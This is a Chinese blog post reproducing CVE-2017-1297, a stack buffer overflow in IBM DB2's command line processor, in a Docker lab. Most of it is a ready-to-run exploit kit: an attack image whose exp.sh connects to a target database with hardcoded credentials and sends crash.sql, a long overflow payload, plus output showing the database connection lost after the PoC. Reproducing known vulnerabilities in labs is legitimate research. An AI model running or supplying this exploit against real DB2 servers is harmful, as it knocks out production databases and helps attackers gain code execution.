CVE-2017-1297漏洞复现

已于 2024-01-18 19:56:04 修改
阅读量1.5k 收藏 40
点赞数 44
分类专栏: 漏洞复现 文章标签: 安全 db docker
于 2024-01-18 19:51:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43694227/article/details/135682706
版权
文章详细描述了CVE-2017-1297漏洞在IBMDB2数据库中的影响,包括堆栈溢出和任意代码执行的风险。作者提供了攻击镜像构建脚本和被测环境配置,展示了如何利用这个漏洞进行攻击并查看攻击效果。
摘要由CSDN通过智能技术生成

CVE-2017-1297漏洞复现

首次发表于个人网站:https://yumlii33.github.io/

参考链接

IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow - Multiple dos Exploit

漏洞说明

IBM DB2 for Linux, UNIX and Windows 9.2, 10.1, 10.5, and 11.1 (includes DB2 Connect Server) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code.

攻击镜像构建

  • exp.sh:

    #!/bin/bash
echo "[+] 正在准备连接目标db2数据库"
echo $1
echo $2
db2 catalog tcpip4 node remotedb remote $1 server $2
db2 catalog database testdb3 as testdb33 at node remotedb
db2 connect to testdb33 user db2inst1 using 123456
echo "[+] 已连接成功目标数据库"
echo "[+] 正在查询目标数据库数据"
# 查询数据
db2 -f select.sql
echo "[+] 正在发送PoC"
# 发送 PoC
db2 -f crash.sql
echo "[+] PoC发送成功"
echo "[+] 再次尝试查询数据库"
db2 -f select.sql

  • select.sql:

    select * from tbl4

  • crash.sql:

    CALL AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;

  • entrypoint.sh:

    #!/bin/bash
cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  
./db2icrt -u db2inst1 db2inst1 
su - db2inst1 -c "db2start"

su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"

echo "finish"
echo "Remote IP: $REMOTE_IP"
echo "Remote PORT: $REMOTE_PORT"
# STR=$(echo $3 | cut -d "[" -f 2 |cut -d  "]" -f 1 | cut -d "'" -f 2)
# echo $STR
su - db2inst1 -c "cd / && bash /exp.sh $REMOTE_IP $REMOTE_PORT"

tail -f /dev/null

  • Dockerfile:

    FROM centos:7.2.1511

COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf


RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio


# RUN chmod 644 /etc/sysctl.conf
# RUN sysctl -p 
RUN ipcs -l

RUN groupadd -g 901 db2iadm1 && \
    groupadd -g 902 db2fadm1 && \
    groupadd -g 903 dasadm1  && \
    useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m  db2inst1 && \ 
    useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
    useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
    echo 'db2inst1:123456' | chpasswd



# CMD ["tail",'-f','/dev/null']

# RUN cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
# RUN cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  &&\
#     ./db2icrt -u db2inst1 db2inst1 


# RUN db2 create database KHYX_YS using codeset GBK territory CN
# RUN db2 create database KHYX_YS 
# RUN db2set –all
COPY entrypoint.sh /entrypoint.sh
COPY exp.sh /exp.sh
COPY select.sql /select.sql
COPY crash.sql /crash.sql

RUN chmod +x /entrypoint.sh
RUN chmod +x /exp.sh

ENV REMOTE_IP=${REMOTE_IP}
ENV REMOTE_PORT=${REMOTE_PORT}
ENTRYPOINT ["/entrypoint.sh"]


# CMD ['REMOTE_IP']

# CMD ["tail",'-f','/dev/null']


EXPOSE 60000

  • 镜像构建(获得docker_image_id_1)

    docker build .

被测环境搭建

  • create_table.sql:

    CREATE DATABASE testdb3
connect to testdb3

CREATE TABLE tbl4 (stu_name CHAR(10) NOT NULL PRIMARY KEY)
ALTER TABLE tbl4 ADD COLUMN stu_age CHAR(10)
INSERT INTO tbl4 VALUES ('alice','20')
INSERT INTO tbl4 VALUES ('bob','16')
INSERT INTO tbl4 VALUES ('tom','19')
INSERT INTO tbl4 VALUES ('john','32')
INSERT INTO tbl4 VALUES ('amy','13')
INSERT INTO tbl4 VALUES ('france','56')
INSERT INTO tbl4 VALUES ('frank','41')

SELECT * FROM tbl4

  • entrypoint.sh:

    #!/bin/bash
cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  
./db2icrt -u db2inst1 db2inst1 

su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"

su - db2inst1 -c "cd / && db2 -f create_table.sql"

  • Dockerfile:

    FROM centos:7.2.1511

COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf


RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio

RUN ipcs -l

RUN groupadd -g 901 db2iadm1 && \
    groupadd -g 902 db2fadm1 && \
    groupadd -g 903 dasadm1  && \
    useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m  db2inst1 && \ 
    useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
    useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
    echo 'db2inst1:123456' | chpasswd

COPY entrypoint.sh /entrypoint.sh
# COPY exp.sh /exp.sh
COPY create_table.sql /create_table.sql
# COPY crash.sql /crash.sql

RUN chmod +x /entrypoint.sh
# RUN chmod +x /exp.sh

# ENV REMOTE_IP=${REMOTE_IP}



ENTRYPOINT ["/entrypoint.sh"]

EXPOSE 60000
# CMD ['REMOTE_IP']

# CMD ["tail",'-f','/dev/null']

  • 镜像构建(获得docker_image_id_2)

    docker build.

被测环境容器启动(比较慢)

docker run -it -d --privileged -p 60000:60000  docker_image_id_2

攻击脚本执行

# REMOTE_IP为被测环境的ip
# REMOTE_PORT为被测环境的端口
# docker_image_id_1 为攻击镜像id

docker run --network host -it -d --privileged -e REMOTE_IP='192.168.33.44' -e REMOTE_PORT='60000' docker_image_id_1

攻击成功效果

……(此处省略n行)……

[+] 已连接成功目标数据库
[+] 正在查询目标数据库数据

STU_NAME   STU_AGE   
---------- ----------
alice      20        
bob        16        
tom        19        
john       32        
amy        13        
france     56        
frank      41        

7 record(s) selected.


[+] 正在发送PoC
[+] PoC发送成功
[+] 再次尝试查询数据库
SQL1024N  A database connection does not exist.  SQLSTATE=08003
froM_C
关注
专栏目录
漏洞复现】IBM Operational Decision Manager JNDI注入漏洞(CVE-2024-22319)
qq_67810151的博客
02-29 471
IBM Operational Decision Manager 8.10.3、8.10.4、8.10.5.1、8.11、8.11.0.1 和 8.12.0.1 在将未经检查的参数传递给某个 API 时,容易受到通过 JNDI 注入进行的远程代码执行攻击。
CVE-2006-0539漏洞复现
weixin_52355463的博客
05-19 168
受影响软件简介:Fcron是具有GNU 通用公共许可证(GNU GPL) 许可证的计算机程序,可执行周期性命令调度。它是在 Linux 上开发的,应该可以在POSIX系统上运行。与Anacron一样,它不假定系统是连续运行的,并且可以在不一直运行或不定期运行的系统中运行。在fcrontab程序中发现了缓冲区溢出,这是fcron 3.0.0的一部分,升级到fcron 3.0.1更安全,其中包括对这个漏洞的修复。通过使用过长的参数调用程序,本地攻击者可能会溢出缓冲区并导致系统崩溃或可能在系统上执行任意代码。
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1080
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 507
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297
zzzzz1284的博客
03-14 603
CVE-2018-1297
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 524
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
熔断&幽灵漏洞复现
qq_52504945的博客
04-23 3658
熔断,幽灵漏洞原理介绍及其复现
墨者学院“SQL手工注入漏洞测试(Db2数据库)”攻略
最新发布
qq_68186313的博客
07-22 205
墨者学院“SQL手工注入漏洞测试(Db2数据库)”攻略
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297
JiangBuLiu的博客
07-11 2481
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ 漏洞原理 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞CVE-2018-1000861)
JiangBuLiu的博客
07-11 4544
Jenkins远程命令执行漏洞CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
IBM WebSphere 远程代码执行漏洞安全预警通告
内德
09-13 3955
       近日,IBM发布安全通告称修复了一个WebSphere Application Server中一个潜在的远程代码执行漏洞CVE-2018-1567)。攻击者可以构造一个恶意的序列化对象,随后通过SOAP连接器来执行任意JAVA代码.目前没有更多漏洞细节披露         该漏洞 CVSS 得分 9.8, 攻击者可在不经过身份认证的情况下远程对 We bSphere 服务器发起攻...
CVE-2017-3506 漏洞POC复现详细解析
同时,“cve-2017-3506复现”指的是如何在安全研究环境中重现这个漏洞,这对于了解漏洞细节、评估漏洞影响和测试潜在的补丁非常关键。 最后,在压缩包文件名称列表中只有一个文件“CVE-2017-3506-Poc.py”。这个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值